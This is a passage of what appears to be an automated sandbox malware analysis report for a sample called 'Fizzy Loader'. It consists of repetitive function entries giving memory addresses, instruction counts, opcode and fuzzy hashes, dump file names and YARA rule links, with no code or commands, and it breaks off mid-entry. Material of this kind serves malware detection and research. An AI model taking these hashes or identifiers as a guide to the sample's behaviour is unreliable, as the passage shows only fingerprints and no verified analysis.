                                                                                                                                                            • Snapshot File: hcaresult_0_2_7ff848f40000_Fizzy Loader.jbxd
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID:
                                                                                                                                                            • String ID:
                                                                                                                                                            • API String ID:
                                                                                                                                                            • Opcode ID: 961e414c908019223cf3758154317bafc550a0c5f0e611d2df8320649d074c65
                                                                                                                                                            • Instruction ID: 35e86fd9003e4c626dce7522cb38e45f0495beb32efdfcbd92a59b9df96c81e5
                                                                                                                                                            • Opcode Fuzzy Hash: 961e414c908019223cf3758154317bafc550a0c5f0e611d2df8320649d074c65
                                                                                                                                                            • Instruction Fuzzy Hash: F831B231B1CA460FEBB4A72C6855AB563D2EF942E1F0400BAD04DC76D6DF18EC868386
                                                                                                                                                            Function 00007FF848F5D8B0 Relevance: .1, Instructions: 128COMMON
                                                                                                                                                            Download Yara Rule
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000000.00000002.2726953792.00007FF848F40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F40000, based on PE: false
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_0_2_7ff848f40000_Fizzy Loader.jbxd
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID:
                                                                                                                                                            • String ID:
                                                                                                                                                            • API String ID:
                                                                                                                                                            • Opcode ID: 6f5a1ace792454a9354e9763768e05d8c79310352d2aef8996ffc9b416d2e38f
                                                                                                                                                            • Instruction ID: c898a01a4418c7a786c92f9babedaf571ad3306195a5f8ffcae55625ec887230
                                                                                                                                                            • Opcode Fuzzy Hash: 6f5a1ace792454a9354e9763768e05d8c79310352d2aef8996ffc9b416d2e38f
                                                                                                                                                            • Instruction Fuzzy Hash: BA319531B1CD4A0FEBA4B65D945DB7523D1EBA83A1F1005BAD40ECB2D6EF199C824384
                                                                                                                                                            Function 00007FF848F8A140 Relevance: .1, Instructions: 126COMMON
                                                                                                                                                            Download Yara Rule
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000000.00000002.2726953792.00007FF848F40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F40000, based on PE: false
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_0_2_7ff848f40000_Fizzy Loader.jbxd
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID:
                                                                                                                                                            • String ID:
                                                                                                                                                            • API String ID:
                                                                                                                                                            • Opcode ID: a06ddc695343ec8c2e73d2f7d52f22c9b36077bde3062500890e2f548d65e6d4
                                                                                                                                                            • Instruction ID: d98b0181d159ebdb17127641e2ffa9e8963b8b57a8c9fd28cd1b7128d07f3834
                                                                                                                                                            • Opcode Fuzzy Hash: a06ddc695343ec8c2e73d2f7d52f22c9b36077bde3062500890e2f548d65e6d4
                                                                                                                                                            • Instruction Fuzzy Hash: A3418D30A0CA069FEBA8EB199495E72B3E2FFA8350F04057DD48AC36D5DB25F881C755
                                                                                                                                                            Function 00007FF848F7C658 Relevance: .1, Instructions: 126COMMON
                                                                                                                                                            Download Yara Rule
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000000.00000002.2726953792.00007FF848F40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F40000, based on PE: false
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_0_2_7ff848f40000_Fizzy Loader.jbxd
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID:
                                                                                                                                                            • String ID:
                                                                                                                                                            • API String ID:
                                                                                                                                                            • Opcode ID: 44aa504027310e89c6b0028d1bb0d943dc37241bf0b5a07777f2b816fa76e5a1
                                                                                                                                                            • Instruction ID: e129c4fcd0048ed7f6244e187c191ca4a2c825afd4db3b878f30284659fa585c
                                                                                                                                                            • Opcode Fuzzy Hash: 44aa504027310e89c6b0028d1bb0d943dc37241bf0b5a07777f2b816fa76e5a1
                                                                                                                                                            • Instruction Fuzzy Hash: 1841E232E0DD4A8FEB95EB2C9855AE97BE1FF99340F0401ABD04DE32D6CB246801C785
                                                                                                                                                            Function 00007FF848F4DE98 Relevance: .1, Instructions: 124COMMON
                                                                                                                                                            Download Yara Rule
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000000.00000002.2726953792.00007FF848F40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F40000, based on PE: false
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_0_2_7ff848f40000_Fizzy Loader.jbxd
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID:
                                                                                                                                                            • String ID:
                                                                                                                                                            • API String ID:
                                                                                                                                                            • Opcode ID: 6e9fd8cff624c6c0ae84053096e9bbe7dbbc52dc1730fd821e26528086b74c4e
                                                                                                                                                            • Instruction ID: 1527dcd752d20152c94a084daea98dfa31609325bc4f7043a22769475cecd71f
                                                                                                                                                            • Opcode Fuzzy Hash: 6e9fd8cff624c6c0ae84053096e9bbe7dbbc52dc1730fd821e26528086b74c4e
                                                                                                                                                            • Instruction Fuzzy Hash: 7D411B6248E7C24FE353837098355927FB1AE93224B0E46EFD4C0CF4A3E2495A4AC363
                                                                                                                                                            Function 00007FF848F565ED Relevance: .1, Instructions: 123COMMON
                                                                                                                                                            Download Yara Rule
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000000.00000002.2726953792.00007FF848F40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F40000, based on PE: false
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_0_2_7ff848f40000_Fizzy Loader.jbxd
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID:
                                                                                                                                                            • String ID:
                                                                                                                                                            • API String ID:
                                                                                                                                                            • Opcode ID: 0899331f65c98fde94200e57d23bb98339e2508d2921e2b7c9fcf74577509673
                                                                                                                                                            • Instruction ID: ef7f92218fcd6d19570bb4eef8a3f26de475d3322fb0adc452339a51897b05db
                                                                                                                                                            • Opcode Fuzzy Hash: 0899331f65c98fde94200e57d23bb98339e2508d2921e2b7c9fcf74577509673
                                                                                                                                                            • Instruction Fuzzy Hash: 38314630A1C5465FE7A9AB248054079BBE2EF96BD0F14457EC0DBC71C7EF2C68418354
                                                                                                                                                            Function 00007FF848F5F030 Relevance: .1, Instructions: 123COMMON
                                                                                                                                                            Download Yara Rule
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000000.00000002.2726953792.00007FF848F40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F40000, based on PE: false
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_0_2_7ff848f40000_Fizzy Loader.jbxd
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID:
                                                                                                                                                            • String ID:
                                                                                                                                                            • API String ID:
                                                                                                                                                            • Opcode ID: bdbc7fbcccd1849afe0cef2920f2f8ba6b9e0d65e6b987761934c0a785039950
                                                                                                                                                            • Instruction ID: 1a88c6d1c89487021de319500d0e5a09d9c3e3dace53602dddb50a2d4d796d81
                                                                                                                                                            • Opcode Fuzzy Hash: bdbc7fbcccd1849afe0cef2920f2f8ba6b9e0d65e6b987761934c0a785039950
                                                                                                                                                            • Instruction Fuzzy Hash: 72314C3691D5159ED2587A1D78055FA3BD0EF947A8F04423FE4498B1D3CF1C784682E9
                                                                                                                                                            Function 00007FF848F4E853 Relevance: .1, Instructions: 118COMMON
                                                                                                                                                            Download Yara Rule
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000000.00000002.2726953792.00007FF848F40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F40000, based on PE: false
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_0_2_7ff848f40000_Fizzy Loader.jbxd
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID:
                                                                                                                                                            • String ID:
                                                                                                                                                            • API String ID:
                                                                                                                                                            • Opcode ID: 6d28775c65936793fefefdf6aba47024d2fcd3c892fc9b0189c3c44e274df942
                                                                                                                                                            • Instruction ID: 1ea8a05be1bafb705891a5cc66f9d22ebe0516891b5d6ee609425191b28f4a59
                                                                                                                                                            • Opcode Fuzzy Hash: 6d28775c65936793fefefdf6aba47024d2fcd3c892fc9b0189c3c44e274df942
                                                                                                                                                            • Instruction Fuzzy Hash: C4311D30A1C90E8FDB88EF58D491BAA73A1FFA8750F504566E40DD32C6CB78E856C784
                                                                                                                                                            Function 00007FF848F47AE0 Relevance: .1, Instructions: 114COMMON
                                                                                                                                                            Download Yara Rule
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000000.00000002.2726953792.00007FF848F40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F40000, based on PE: false
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_0_2_7ff848f40000_Fizzy Loader.jbxd
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID:
                                                                                                                                                            • String ID:
                                                                                                                                                            • API String ID:
                                                                                                                                                            • Opcode ID: c0c1f65a531a36660454157d24b30134a90b433558d326ebb8e04d6e61ed70be
                                                                                                                                                            • Instruction ID: 015cbc2ca83e95310050827ebf4775510192d2b5ad50cf64719cc44b1124b22b
                                                                                                                                                            • Opcode Fuzzy Hash: c0c1f65a531a36660454157d24b30134a90b433558d326ebb8e04d6e61ed70be
                                                                                                                                                            • Instruction Fuzzy Hash: F2310D31D1D98E4FD792F76888252B93BA1FF29A80F0400B7D04DE71E7DF28A9088315
                                                                                                                                                            Function 00007FF848F5EE70 Relevance: .1, Instructions: 114COMMON
                                                                                                                                                            Download Yara Rule
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000000.00000002.2726953792.00007FF848F40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F40000, based on PE: false
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_0_2_7ff848f40000_Fizzy Loader.jbxd
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID:
                                                                                                                                                            • String ID:
                                                                                                                                                            • API String ID:
                                                                                                                                                            • Opcode ID: cec5b45e77547387fdd991981cd77d49bc4ed9b3f90384149d0df2d28f751047
                                                                                                                                                            • Instruction ID: 839306620529685c5cf06f6039fb302ba922746070bc91ef3dc9e08a1ea36d51
                                                                                                                                                            • Opcode Fuzzy Hash: cec5b45e77547387fdd991981cd77d49bc4ed9b3f90384149d0df2d28f751047
                                                                                                                                                            • Instruction Fuzzy Hash: 9E310131A0DA4E0FEB95FB6C8855A7677D2EF943A0F1446BAC00DD31C6DF38A8468394
                                                                                                                                                            Function 00007FF848F4F1DD Relevance: .1, Instructions: 111COMMON
                                                                                                                                                            Download Yara Rule
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000000.00000002.2726953792.00007FF848F40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F40000, based on PE: false
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_0_2_7ff848f40000_Fizzy Loader.jbxd
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID:
                                                                                                                                                            • String ID:
                                                                                                                                                            • API String ID:
                                                                                                                                                            • Opcode ID: af1c81ac3c52a5cba92fcfbf5bd1a1791fbf8ffea70141f9baf38c251fd5ddc9
                                                                                                                                                            • Instruction ID: f5c35712bf940b930dda4c3c7447ff8ed2f505190980f2cddb24c1b3fd497fff
                                                                                                                                                            • Opcode Fuzzy Hash: af1c81ac3c52a5cba92fcfbf5bd1a1791fbf8ffea70141f9baf38c251fd5ddc9
                                                                                                                                                            • Instruction Fuzzy Hash: FD31A977D0F6925EE251B73C78614E63B70FF526BDB0802B3D18C8D093EB0D654A86A8
                                                                                                                                                            Function 00007FF848F46D26 Relevance: .1, Instructions: 108COMMON
                                                                                                                                                            Download Yara Rule
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000000.00000002.2726953792.00007FF848F40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F40000, based on PE: false
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_0_2_7ff848f40000_Fizzy Loader.jbxd
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID:
                                                                                                                                                            • String ID:
                                                                                                                                                            • API String ID:
                                                                                                                                                            • Opcode ID: 88c6970f337650f14b568e2d61f6d4a9e391c221a558cbde81d87e995f6c40f8
                                                                                                                                                            • Instruction ID: ee660d0e7bcc0f5db03534d0e92c9a61cc68b4020e488e9d260be10be44f7455
                                                                                                                                                            • Opcode Fuzzy Hash: 88c6970f337650f14b568e2d61f6d4a9e391c221a558cbde81d87e995f6c40f8
                                                                                                                                                            • Instruction Fuzzy Hash: E6316E3091D54A8FE789FB68C455AB9BBE1EF69740F4401BAD00ED72E3CF29A841C744
                                                                                                                                                            Function 00007FF848F9CB30 Relevance: .1, Instructions: 107COMMON
                                                                                                                                                            Download Yara Rule
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000000.00000002.2726953792.00007FF848F40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F40000, based on PE: false
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_0_2_7ff848f40000_Fizzy Loader.jbxd
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID:
                                                                                                                                                            • String ID:
                                                                                                                                                            • API String ID:
                                                                                                                                                            • Opcode ID: 09baa177c3c735feaa32f24677de21f09ee8cd5cbaa9d24cdc9f35fa1cf8faa0
                                                                                                                                                            • Instruction ID: 808e549231c145b78c858419bc58ed8ce9e8158846f4ac93053813813cfca0ce
                                                                                                                                                            • Opcode Fuzzy Hash: 09baa177c3c735feaa32f24677de21f09ee8cd5cbaa9d24cdc9f35fa1cf8faa0
                                                                                                                                                            • Instruction Fuzzy Hash: 8A315C30A1CF1A8FEBA4FB5DC084A62B3E0FB68350F500179E44EC3692DB29F8458784
                                                                                                                                                            Function 00007FF848F51640 Relevance: .1, Instructions: 105COMMON
                                                                                                                                                            Download Yara Rule
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000000.00000002.2726953792.00007FF848F40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F40000, based on PE: false
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_0_2_7ff848f40000_Fizzy Loader.jbxd
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID:
                                                                                                                                                            • String ID:
                                                                                                                                                            • API String ID:
                                                                                                                                                            • Opcode ID: 6ab28384f8343b4702004d61040af60f20c8959cf25931c19b65e21985fc9453
                                                                                                                                                            • Instruction ID: cedd13a25b435d797c478e78f437c0e87f2d3bbd4e1cf7e71462037ab5c949fd
                                                                                                                                                            • Opcode Fuzzy Hash: 6ab28384f8343b4702004d61040af60f20c8959cf25931c19b65e21985fc9453
                                                                                                                                                            • Instruction Fuzzy Hash: 52212732E1ED8A1EF655B36C54A46F6ABE1EF553A4F0802B7C04EC61C7ED0C68468258
                                                                                                                                                            Function 00007FF848F59B90 Relevance: .1, Instructions: 103COMMON
                                                                                                                                                            Download Yara Rule
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000000.00000002.2726953792.00007FF848F40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F40000, based on PE: false
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_0_2_7ff848f40000_Fizzy Loader.jbxd
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID:
                                                                                                                                                            • String ID:
                                                                                                                                                            • API String ID:
                                                                                                                                                            • Opcode ID: d4e11999bc031b5431fc895da8e5b72d28a6cc6452a1f080c28c24323dd6fc5f
                                                                                                                                                            • Instruction ID: 1f0fa12810396294dae34cc8b5b359d0ccfbdde9f67898a0604cf0c7c1fef22d
                                                                                                                                                            • Opcode Fuzzy Hash: d4e11999bc031b5431fc895da8e5b72d28a6cc6452a1f080c28c24323dd6fc5f
                                                                                                                                                            • Instruction Fuzzy Hash: 37311830618A098FDBA4FB28C044B6577E1FFA9345F5005B9E84DC32A2DF75E885CB84
                                                                                                                                                            Function 00007FF848F513EC Relevance: .1, Instructions: 103COMMON
                                                                                                                                                            Download Yara Rule
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000000.00000002.2726953792.00007FF848F40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F40000, based on PE: false
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_0_2_7ff848f40000_Fizzy Loader.jbxd
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID:
                                                                                                                                                            • String ID:
                                                                                                                                                            • API String ID:
                                                                                                                                                            • Opcode ID: f0955b4fb7ded0c4be3ccbfda4c8ae287861a51ddf4cbeb5ff587c7a8dc8f330
                                                                                                                                                            • Instruction ID: b65ae58c7c00925a393e781c1358e0ea60a42d8bd7ed10945491c149cb19469a
                                                                                                                                                            • Opcode Fuzzy Hash: f0955b4fb7ded0c4be3ccbfda4c8ae287861a51ddf4cbeb5ff587c7a8dc8f330
                                                                                                                                                            • Instruction Fuzzy Hash: 3A31F33290C91E4EF774B32898056FAB2D1EF853A8F44063AD45ED31D3DF28799A46C5
                                                                                                                                                            Function 00007FF848F506AA Relevance: .1, Instructions: 101COMMON
                                                                                                                                                            Download Yara Rule
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000000.00000002.2726953792.00007FF848F40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F40000, based on PE: false
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_0_2_7ff848f40000_Fizzy Loader.jbxd
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID:
                                                                                                                                                            • String ID:
                                                                                                                                                            • API String ID:
                                                                                                                                                            • Opcode ID: 751c3e67f7f45f826cc520f2309cf7672e160910d2e75fdde905f6303ec95d68
                                                                                                                                                            • Instruction ID: 55be0f5868b4a10b1137da98f0e6f4fa11624368dd645773b798b2323b105ae1
                                                                                                                                                            • Opcode Fuzzy Hash: 751c3e67f7f45f826cc520f2309cf7672e160910d2e75fdde905f6303ec95d68
                                                                                                                                                            • Instruction Fuzzy Hash: A221BF36D0D95E4EF7A4BB2468052F9B7A0EFE5790F040176D85CC34C3EF2D691A4A89
                                                                                                                                                            Function 00007FF848F5B001 Relevance: .1, Instructions: 101COMMON
                                                                                                                                                            Download Yara Rule
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000000.00000002.2726953792.00007FF848F40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F40000, based on PE: false
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_0_2_7ff848f40000_Fizzy Loader.jbxd
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID:
                                                                                                                                                            • String ID:
                                                                                                                                                            • API String ID:
                                                                                                                                                            • Opcode ID: 4aa5515586d789f12602b83362f7dda6c026fa119c645bd85876ea4aec160ef1
                                                                                                                                                            • Instruction ID: 1b2ba3c5f3083a0a213b81cc116870645493a54ed2cb0d336278302038b871a8
                                                                                                                                                            • Opcode Fuzzy Hash: 4aa5515586d789f12602b83362f7dda6c026fa119c645bd85876ea4aec160ef1
                                                                                                                                                            • Instruction Fuzzy Hash: C431A331D2DA8A8FE78AEB2848152B8FBF1EF1A380F0405FAD059D75D3DB2C59848355
                                                                                                                                                            Function 00007FF848F5CAFB Relevance: .1, Instructions: 100COMMON
                                                                                                                                                            Download Yara Rule
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000000.00000002.2726953792.00007FF848F40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F40000, based on PE: false
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_0_2_7ff848f40000_Fizzy Loader.jbxd
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID:
                                                                                                                                                            • String ID:
                                                                                                                                                            • API String ID:
                                                                                                                                                            • Opcode ID: e0d13d75f455aefcc5c0e0421a3cf9657301003e45378552fe51387ae0d981a7
                                                                                                                                                            • Instruction ID: d90326746438dfae92ef0d5c4e758be0fbbd09b1f6c4c81294c0bbe83a51955d
                                                                                                                                                            • Opcode Fuzzy Hash: e0d13d75f455aefcc5c0e0421a3cf9657301003e45378552fe51387ae0d981a7
                                                                                                                                                            • Instruction Fuzzy Hash: E621A331A0DA0A5FD794FB18E4846B673E1FF98364F10477AD44DC328ADF2AE9428785
                                                                                                                                                            Function 00007FF848F46E6D Relevance: .1, Instructions: 98COMMON
                                                                                                                                                            Download Yara Rule
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000000.00000002.2726953792.00007FF848F40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F40000, based on PE: false
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_0_2_7ff848f40000_Fizzy Loader.jbxd
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID:
                                                                                                                                                            • String ID:
                                                                                                                                                            • API String ID:
                                                                                                                                                            • Opcode ID: e82a22915e6a2bcc5f606f54fcc603f600d745a265a0a9882407cdadc4b215d2
                                                                                                                                                            • Instruction ID: ea665c0c9281301022f6908d2433767146b78547c17e6afda759391b9bbc9cd9
                                                                                                                                                            • Opcode Fuzzy Hash: e82a22915e6a2bcc5f606f54fcc603f600d745a265a0a9882407cdadc4b215d2
                                                                                                                                                            • Instruction Fuzzy Hash: 8531483190E6C94FD741EBB488196E97FF1EF5A710F0441EBD088DB1A3DA2C984A8B55
                                                                                                                                                            Function 00007FF848F46D42 Relevance: .1, Instructions: 97COMMON
                                                                                                                                                            Download Yara Rule
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000000.00000002.2726953792.00007FF848F40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F40000, based on PE: false
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_0_2_7ff848f40000_Fizzy Loader.jbxd
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID:
                                                                                                                                                            • String ID:
                                                                                                                                                            • API String ID:
                                                                                                                                                            • Opcode ID: 7a83045679e7506d3326901a2765e83d61dea3d02ae7e56d5b7faaad11b29d64
                                                                                                                                                            • Instruction ID: 0c9fe196ca08e2e28dd3d4cecd789e3686daa85d2120a8735902393a0fca730b
                                                                                                                                                            • Opcode Fuzzy Hash: 7a83045679e7506d3326901a2765e83d61dea3d02ae7e56d5b7faaad11b29d64
                                                                                                                                                            • Instruction Fuzzy Hash: 8431823090D54A8FE789FB68C455AB9BBE1EF29740F4404BAD14DD72E3CF296841C745
                                                                                                                                                            Function 00007FF848F59A67 Relevance: .1, Instructions: 96COMMON
                                                                                                                                                            Download Yara Rule
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000000.00000002.2726953792.00007FF848F40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F40000, based on PE: false
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_0_2_7ff848f40000_Fizzy Loader.jbxd
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID:
                                                                                                                                                            • String ID:
                                                                                                                                                            • API String ID:
                                                                                                                                                            • Opcode ID: 3f00e34e93a6e572a606a928caf7d7edad947c7cf8b5d679557155bb3ae04e67
                                                                                                                                                            • Instruction ID: 4d17a27a8998f7f2578ffbd369aa17a7c944257604f88497ca25a484ade76048
                                                                                                                                                            • Opcode Fuzzy Hash: 3f00e34e93a6e572a606a928caf7d7edad947c7cf8b5d679557155bb3ae04e67
                                                                                                                                                            • Instruction Fuzzy Hash: D1216D3171CA094FD69CEA2CD849A7577E1FBA9310B1001AAE04EC36A6EE25EC468784
                                                                                                                                                            Function 00007FF848F48191 Relevance: .1, Instructions: 94COMMON
                                                                                                                                                            Download Yara Rule
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000000.00000002.2726953792.00007FF848F40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F40000, based on PE: false
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_0_2_7ff848f40000_Fizzy Loader.jbxd
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID:
                                                                                                                                                            • String ID:
                                                                                                                                                            • API String ID:
                                                                                                                                                            • Opcode ID: d8f698df838dd065abc0b0d4000a59b97e8cfe7b7d058094c45a177dfec62225
                                                                                                                                                            • Instruction ID: 8d96ab588e332909ce350b884e8cada548017ace0579b5f9718df89955ae0f2b
                                                                                                                                                            • Opcode Fuzzy Hash: d8f698df838dd065abc0b0d4000a59b97e8cfe7b7d058094c45a177dfec62225
                                                                                                                                                            • Instruction Fuzzy Hash: 4521CF3196DAC90FE785B72888292E57BE1EFA6751F0901FBD48EC71E3DA1C580A8315
                                                                                                                                                            Function 00007FF848F42A7A Relevance: .1, Instructions: 92COMMON
                                                                                                                                                            Download Yara Rule
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000000.00000002.2726953792.00007FF848F40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F40000, based on PE: false
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_0_2_7ff848f40000_Fizzy Loader.jbxd
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID:
                                                                                                                                                            • String ID:
                                                                                                                                                            • API String ID:
                                                                                                                                                            • Opcode ID: 3e5fde65eb370ce9a83068aa3aacbf110a7bb4ce350efadc12984345bf9893f6
                                                                                                                                                            • Instruction ID: 80ec5f79fdd46619893c91c31815d375efca6907aded7274435e90b499361139
                                                                                                                                                            • Opcode Fuzzy Hash: 3e5fde65eb370ce9a83068aa3aacbf110a7bb4ce350efadc12984345bf9893f6
                                                                                                                                                            • Instruction Fuzzy Hash: 2A21273091D7C64FD756E7788814475BBD0EFA2761B0501FBD448D71E2CF689842C756
                                                                                                                                                            Function 00007FF848F471D3 Relevance: .1, Instructions: 91COMMON
                                                                                                                                                            Download Yara Rule
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000000.00000002.2726953792.00007FF848F40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F40000, based on PE: false
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_0_2_7ff848f40000_Fizzy Loader.jbxd
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID:
                                                                                                                                                            • String ID:
                                                                                                                                                            • API String ID:
                                                                                                                                                            • Opcode ID: b69b5bf6933209678320c01f566c8c7546e47b40de7357377fd9e9bc0ca16f38
                                                                                                                                                            • Instruction ID: 7dae590fcfcb5018d965ee4b0ef17f652f744a794a25340c1b48214bcfd77f03
                                                                                                                                                            • Opcode Fuzzy Hash: b69b5bf6933209678320c01f566c8c7546e47b40de7357377fd9e9bc0ca16f38
                                                                                                                                                            • Instruction Fuzzy Hash: C621083290EB994FF355B738A8550E67BD0EFD26A8F0407BBD0949B0E3EE1C54498296
                                                                                                                                                            Function 00007FF848F59A28 Relevance: .1, Instructions: 90COMMON
                                                                                                                                                            Download Yara Rule
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000000.00000002.2726953792.00007FF848F40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F40000, based on PE: false
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_0_2_7ff848f40000_Fizzy Loader.jbxd
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID:
                                                                                                                                                            • String ID:
                                                                                                                                                            • API String ID:
                                                                                                                                                            • Opcode ID: 4fd79fd405dca41d44723d4546e96e4edde3faf1c721c608d415729c98921cc7
                                                                                                                                                            • Instruction ID: eb5d5f2bf1d5c7a7a7e2ce1070587b7edd1b1bec2813386159f24b9f6ad2039c
                                                                                                                                                            • Opcode Fuzzy Hash: 4fd79fd405dca41d44723d4546e96e4edde3faf1c721c608d415729c98921cc7
                                                                                                                                                            • Instruction Fuzzy Hash: 6121AE31D2CA5E9EEB95EB2848193B9F6E1EF19380F0401BAD019E76D3DF2819848359
                                                                                                                                                            Function 00007FF848F43E4D Relevance: .1, Instructions: 85COMMON
                                                                                                                                                            Download Yara Rule
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000000.00000002.2726953792.00007FF848F40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F40000, based on PE: false
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_0_2_7ff848f40000_Fizzy Loader.jbxd
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID:
                                                                                                                                                            • String ID:
                                                                                                                                                            • API String ID:
                                                                                                                                                            • Opcode ID: 79b2abb220b6bfb603fabb5cf9cb63da4e657f5f6d2af073b12343852855d059
                                                                                                                                                            • Instruction ID: 7d61675ef58551ed91cf29ada5a012f4e4477b4344f3ee07d64fec03c8134a4c
